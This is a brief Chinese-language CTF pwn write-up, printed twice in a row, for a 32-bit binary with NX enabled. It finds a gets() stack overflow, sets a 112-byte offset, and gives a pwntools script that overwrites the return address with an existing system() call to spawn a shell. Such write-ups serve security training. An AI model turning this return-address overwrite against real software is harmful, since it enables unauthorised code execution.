检查程序,发现是32位,开了NX保护
拖入ida32
get()存在溢出,gdb调试
偏移112字节后覆盖返回地址,程序本身有调用system函数,
exp如下:
from pwn import *
p=process('./pwn1')
payload='a'*112+p32(0x0804863A)
p.recvline()
p.sendline(payload)
p.interactive()
成功拿到shell
题目地址
检查程序,发现是32位,开了NX保护
拖入ida32
get()存在溢出,gdb调试
偏移112字节后覆盖返回地址,程序本身有调用system函数,
exp如下:
from pwn import *
p=process('./pwn1')
payload='a'*112+p32(0x0804863A)
p.recvline()
p.sendline(payload)
p.interactive()
成功拿到shell
题目地址